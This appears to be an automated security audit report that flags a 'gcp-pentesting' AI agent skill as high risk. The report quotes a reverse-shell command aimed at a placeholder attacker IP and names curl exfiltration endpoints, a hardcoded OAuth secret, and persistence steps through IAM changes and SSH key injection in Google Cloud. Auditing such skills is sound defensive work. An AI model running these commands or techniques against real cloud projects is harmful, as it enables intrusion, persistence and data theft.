gcp-pentesting
Fail
Audited by Gen Agent Trust Hub on May 4, 2026
Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, CREDENTIALS_UNSAFE
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides explicit instructions for establishing reverse shells on Compute Engine instances. Specifically, it demonstrates injecting a startup script that uses Bash redirection to connect to an attacker-controlled IP address and port ('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &').
- [DATA_EXFILTRATION]: Multiple sections describe techniques for exfiltrating sensitive data, such as OIDC tokens and system logs, to external endpoints. This includes using curl to send data to placeholders like 'https://ATTACKER_SERVER/collect' and 'https://ATTACKER_SERVER/beacon'.
- [COMMAND_EXECUTION]: The methodology is heavily centered on executing shell commands to manipulate cloud resources. It includes instructions for creating Service Account keys, modifying IAM policies to grant administrative roles, and injecting SSH keys into project metadata to gain persistent access across all virtual machines.
- [CREDENTIALS_UNSAFE]: The skill contains a hardcoded OAuth client secret ('ZmssLNjJy2998hD4CTg2ejr2') associated with the gcloud CLI. While this is a known public secret for the utility, its presence in a script used for automated tasks is a security concern.
- [REMOTE_CODE_EXECUTION]: The documentation encourages the download and execution of several third-party security tools and scripts (e.g., 'gcp_scanner', 'gcpwn', 'cloud_enum.py', 'gcpbucketbrute.py') from unverified sources without integrity checks or version pinning.
Recommendations
- AI detected serious security threats
Audit Metadata